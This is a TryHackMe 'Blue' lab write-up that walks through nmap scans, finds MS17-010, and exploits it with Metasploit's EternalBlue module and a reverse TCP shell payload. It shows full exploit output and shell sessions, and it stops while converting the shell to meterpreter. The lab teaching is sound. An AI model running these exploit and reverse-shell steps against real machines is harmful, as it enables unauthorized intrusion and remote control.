TryHackMe - Learn - Offensive Pentesting - Blue
Task 1: Recon
Scan and learn what exploit this machine is vulnerable to. Please note that this machine does not respond to ping (ICMP) and may take a few minutes to boot up. This room is not meant to be a boot2root CTF, rather, this is an educational series for complete beginners. Professionals will likely get very little out of this room beyond basic practice as the process here is meant to be beginner-focused.
- Scan the machine. (If you are unsure how to tackle this, I recommend checking out the Nmap room)
1
| export IP="10.10.14.17"
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
| mkdir nmap
sudo nmap -sC -sV -v -O $IP -o nmap/initial
# Nmap 7.92 scan initiated Sat Apr 9 02:01:41 2022 as: nmap -sC -sV -v -O -o nmap/initial 10.10.14.17
Nmap scan report for 10.10.14.17
Host is up (0.039s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE VERSION
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
3389/tcp open tcpwrapped
| ssl-cert: Subject: commonName=Jon-PC
| Issuer: commonName=Jon-PC
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha1WithRSAEncryption
| Not valid before: 2022-04-07T23:52:22
| Not valid after: 2022-10-07T23:52:22
| MD5: 9796 2e4d cd63 7fe6 b315 ab65 f94c 0baf
|_SHA-1: 4ff6 8427 ce68 f8d3 2e98 a71f f0e9 cd4c 9658 1e1a
|_ssl-date: 2022-04-09T00:03:10+00:00; +1s from scanner time.
| rdp-ntlm-info:
| Target_Name: JON-PC
| NetBIOS_Domain_Name: JON-PC
| NetBIOS_Computer_Name: JON-PC
| DNS_Domain_Name: Jon-PC
| DNS_Computer_Name: Jon-PC
| Product_Version: 6.1.7601
|_ System_Time: 2022-04-09T00:02:55+00:00
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
49159/tcp open msrpc Microsoft Windows RPC
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.92%E=4%D=4/9%OT=135%CT=1%CU=41609%PV=Y%DS=2%DC=I%G=Y%TM=6250CD3
OS:D%P=x86_64-pc-linux-gnu)SEQ(SP=106%GCD=1%ISR=10B%TI=I%CI=I%II=I%SS=S%TS=
OS:7)SEQ(SP=106%GCD=1%ISR=10B%TI=I%CI=I%TS=7)OPS(O1=M505NW8ST11%O2=M505NW8S
OS:T11%O3=M505NW8NNT11%O4=M505NW8ST11%O5=M505NW8ST11%O6=M505ST11)WIN(W1=200
OS:0%W2=2000%W3=2000%W4=2000%W5=2000%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M50
OS:5NW8NNS%CC=N%Q=)T1(R=Y%DF=Y%T=80%S=O%A=S+%F=AS%RD=0%Q=)T2(R=Y%DF=Y%T=80%
OS:W=0%S=Z%A=S%F=AR%O=%RD=0%Q=)T3(R=Y%DF=Y%T=80%W=0%S=Z%A=O%F=AR%O=%RD=0%Q=
OS:)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=
OS:S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=Y%DF
OS:=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=
OS:G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
Uptime guess: 0.009 days (since Sat Apr 9 01:50:42 2022)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=262 (Good luck!)
IP ID Sequence Generation: Incremental
Service Info: Host: JON-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 1h00m01s, deviation: 2h14m10s, median: 0s
| smb2-time:
| date: 2022-04-09T00:02:55
|_ start_date: 2022-04-08T23:52:20
| smb2-security-mode:
| 2.1:
|_ Message signing enabled but not required
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| nbstat: NetBIOS name: JON-PC, NetBIOS user: <unknown>, NetBIOS MAC: 02:5e:37:02:b6:59 (unknown)
| Names:
| JON-PC<00> Flags: <unique><active>
| WORKGROUP<00> Flags: <group><active>
| JON-PC<20> Flags: <unique><active>
| WORKGROUP<1e> Flags: <group><active>
| WORKGROUP<1d> Flags: <unique><active>
|_ \x01\x02__MSBROWSE__\x02<01> Flags: <group><active>
| smb-os-discovery:
| OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
| OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
| Computer name: Jon-PC
| NetBIOS computer name: JON-PC\x00
| Workgroup: WORKGROUP\x00
|_ System time: 2022-04-08T19:02:55-05:00
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sat Apr 9 02:03:09 2022 -- 1 IP address (1 host up) scanned in 88.10 seconds
|
- How many ports are open with a port number under 1000?
There are 3 ports open with a port number under 1000:
135, 139 and 445
- What is this machine vulnerable to? (Answer in the form of: ms??-???, ex: ms08-067)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
| sudo nmap -v --script=vuln -o nmap/vuln $IP
# Nmap 7.92 scan initiated Sat Apr 9 02:09:41 2022 as: nmap -v --script=vuln -o nmap/vuln 10.10.14.17
Pre-scan script results:
| broadcast-avahi-dos:
| Discovered hosts:
| 224.0.0.251
| After NULL UDP avahi packet DoS (CVE-2011-1002).
|_ Hosts are all up (not vulnerable).
Nmap scan report for 10.10.14.17
Host is up (0.034s latency).
Not shown: 991 closed tcp ports (reset)
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
3389/tcp open ms-wbt-server
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49158/tcp open unknown
49159/tcp open unknown
Host script results:
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
|_samba-vuln-cve-2012-1182: NT_STATUS_ACCESS_DENIED
|_smb-vuln-ms10-054: false
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Read data files from: /usr/bin/../share/nmap
# Nmap done at Sat Apr 9 02:11:43 2022 -- 1 IP address (1 host up) scanned in 121.52 seconds
|
The machine seems to be vulnerable to ms17-010 (CVE-2017-0143), also known as
EternalBlue
Task 2: Gain Access
- Find the exploitation code we will run against the machine. What is the full path of the code? (Ex: exploit/……..)
1
2
3
4
5
6
7
8
9
10
11
| msf6 > search ms17-010 -t exploit
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
0 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
1 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
2 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
3 exploit/windows/smb/smb_doublepulsar_rce 2017-04-14 great Yes SMB DOUBLEPULSAR Remote Code Execution
|
We found an exploit for ms17-010.
The exploit exploit/windows/smb/ms17_010_eternalblue should do the trick.
- Show options and set the one required value. What is the name of this value? (All caps for submission)
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
| msf6 > use exploit/windows/smb/ms17_010_eternalblue
[*] No payload configured, defaulting to windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/smb/ms17_010_eternalblue) > show options
Module options (exploit/windows/smb/ms17_010_eternalblue):
Name Current Setting Required Description
---- --------------- -------- -----------
RHOSTS yes The target host(s), see https://github.com/rapid7/metasploit-framework/wik
i/Using-Metasploit
RPORT 445 yes The target port (TCP)
SMBDomain no (Optional) The Windows domain to use for authentication. Only affects Wind
ows Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines
.
SMBPass no (Optional) The password for the specified username
SMBUser no (Optional) The username to authenticate as
VERIFY_ARCH true yes Check if remote architecture matches exploit Target. Only affects Windows
Server 2008 R2, Windows 7, Windows Embedded Standard 7 target machines.
VERIFY_TARGET true yes Check if remote OS matches exploit Target. Only affects Windows Server 200
8 R2, Windows 7, Windows Embedded Standard 7 target machines.
Payload options (windows/x64/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC thread yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.178.101 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
|
The required value we need to set is the IP address of our target machine (out victim).
In our case it is 10.10.14.17
1
2
| msf6 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.14.17
RHOSTS => 10.10.14.17
|
So the name of the require value is RHOSTS
- Usually it would be fine to run this exploit as is; however, for the sake of learning, you should do one more thing before exploiting the target. Enter the following command and press enter:
set payload windows/x64/shell/reverse_tcp
Ok let’s use this reverse tcp payload to get a shell connection via reverse tcp
from the victim.
One important step that THM is not telling me is that I need to set my listener ip
address to the ip of my tun0 adapter since it will not work if I am listening
on my normal wifi adapter because I am connected to a VPN.
So let’s fix that!
1
2
| msf6 exploit(windows/smb/ms17_010_eternalblue) > set LHOST tun0
LHOST => tun0
|
With that set I will try to run the exploit now!
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
| msf6 exploit(windows/smb/ms17_010_eternalblue) > run
[*] Started reverse TCP handler on 10.8.33.96:4444
[*] 10.10.14.17:445 - Using auxiliary/scanner/smb/smb_ms17_010 as check
[+] 10.10.14.17:445 - Host is likely VULNERABLE to MS17-010! - Windows 7 Professional 7601 Service Pack 1 x64 (64-bit)
[*] 10.10.14.17:445 - Scanned 1 of 1 hosts (100% complete)
[+] 10.10.14.17:445 - The target is vulnerable.
[*] 10.10.14.17:445 - Connecting to target for exploitation.
[+] 10.10.14.17:445 - Connection established for exploitation.
[+] 10.10.14.17:445 - Target OS selected valid for OS indicated by SMB reply
[*] 10.10.14.17:445 - CORE raw buffer dump (42 bytes)
[*] 10.10.14.17:445 - 0x00000000 57 69 6e 64 6f 77 73 20 37 20 50 72 6f 66 65 73 Windows 7 Profes
[*] 10.10.14.17:445 - 0x00000010 73 69 6f 6e 61 6c 20 37 36 30 31 20 53 65 72 76 sional 7601 Serv
[*] 10.10.14.17:445 - 0x00000020 69 63 65 20 50 61 63 6b 20 31 ice Pack 1
[+] 10.10.14.17:445 - Target arch selected valid for arch indicated by DCE/RPC reply
[*] 10.10.14.17:445 - Trying exploit with 12 Groom Allocations.
[*] 10.10.14.17:445 - Sending all but last fragment of exploit packet
[*] 10.10.14.17:445 - Starting non-paged pool grooming
[+] 10.10.14.17:445 - Sending SMBv2 buffers
[+] 10.10.14.17:445 - Closing SMBv1 connection creating free hole adjacent to SMBv2 buffer.
[*] 10.10.14.17:445 - Sending final SMBv2 buffers.
[*] 10.10.14.17:445 - Sending last fragment of exploit packet!
[*] 10.10.14.17:445 - Receiving response from exploit packet
[+] 10.10.14.17:445 - ETERNALBLUE overwrite completed successfully (0xC000000D)!
[*] 10.10.14.17:445 - Sending egg to corrupted connection.
[*] 10.10.14.17:445 - Triggering free of corrupted buffer.
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Command shell session 2 opened (10.8.33.96:4444 -> 10.10.14.17:49173 ) at 2022-04-09 02:35:37 +0200
[*] Command shell session 4 opened (10.8.33.96:4444 -> 10.10.14.17:49175 ) at 2022-04-09 02:35:37 +0200
[*] Command shell session 1 opened (10.8.33.96:4444 -> 10.10.14.17:49172 ) at 2022-04-09 02:35:37 +0200
[*] Command shell session 3 opened (10.8.33.96:4444 -> 10.10.14.17:49174 ) at 2022-04-09 02:35:37 +0200
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Command shell session 5 opened (10.8.33.96:4444 -> 10.10.14.17:49176 ) at 2022-04-09 02:35:37 +0200
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[*] Sending stage (336 bytes) to 10.10.14.17
[+] 10.10.14.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.14.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] 10.10.14.17:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
Shell Banner:
Microsoft Windows [Version 6.1.7601]
-----
C:\Windows\system32>
|
I successfully exploited Eternal Blue and got a reverse shell from the victim.
- Confirm that the exploit has run correctly. You may have to press enter for the DOS shell to appear. Background this shell (CTRL + Z). If this failed, you may have to reboot the target VM. Try running it again before a reboot of the target.
I backgrounded the shell session using CTRL + Z
Task 3: Escalate
- If you haven’t already, background the previously gained shell (CTRL + Z). Research online how to convert a shell to meterpreter shell in metasploit. What is the name of the post module we will use? (Exact path, similar to the exploit we previously selected)
I backgrounded the shell using CTRL + Z
Let’s search the correct post-exploitation module to convert this basic shell
to a meterpreter shell!
msf6 exploit(windows/smb/ms17_010_eternalblue) > search -t post meterpreter
This one sounds good: post/multi/manage/shell_to_meterpreter
- Select this (use MODULE_PATH). Show options, what option are we required to change?
msf6 exploit(windows/smb/ms17_010_eternalblue) > use post/multi/manage/shell_to_meterpreter
1
2
3
4
5
6
7
8
9
10
11
| msf6 post(multi/manage/shell_to_meterpreter) > show options
Module options (post/multi/manage/shell_to_meterpreter):
Name Current Setting Required Description
---- --------------- -------- -----------
HANDLER true yes Start an exploit/multi/handler to receive the connection
LHOST no IP of host that will receive the connection from the payload (Will try to auto d
etect).
LPORT 4433 yes Port for payload to connect to.
SESSION yes The session to run this module on
|
The options we need to set is the SESSION option.
- Set the required option, you may need to list all of the sessions to find your target here.
Let’s find the correct session first.
I have a ton of sessions open… I will try the first one.
1
2
3
4
5
6
7
8
9
| msf6 post(multi/manage/shell_to_meterpreter) > sessions
Active sessions
===============
Id Name Type Information Connection
-- ---- ---- ----------- ----------
1 shell x64/windows Shell Banner: Microsoft Windows [Version 6 10.8.33.96:4444 -> 10.10.14.17:49172 (10.1
.1.7601] ----- 0.14.17)
|
1
2
| msf6 post(multi/manage/shell_to_meterpreter) > set SESSION 1
SESSION => 1
|
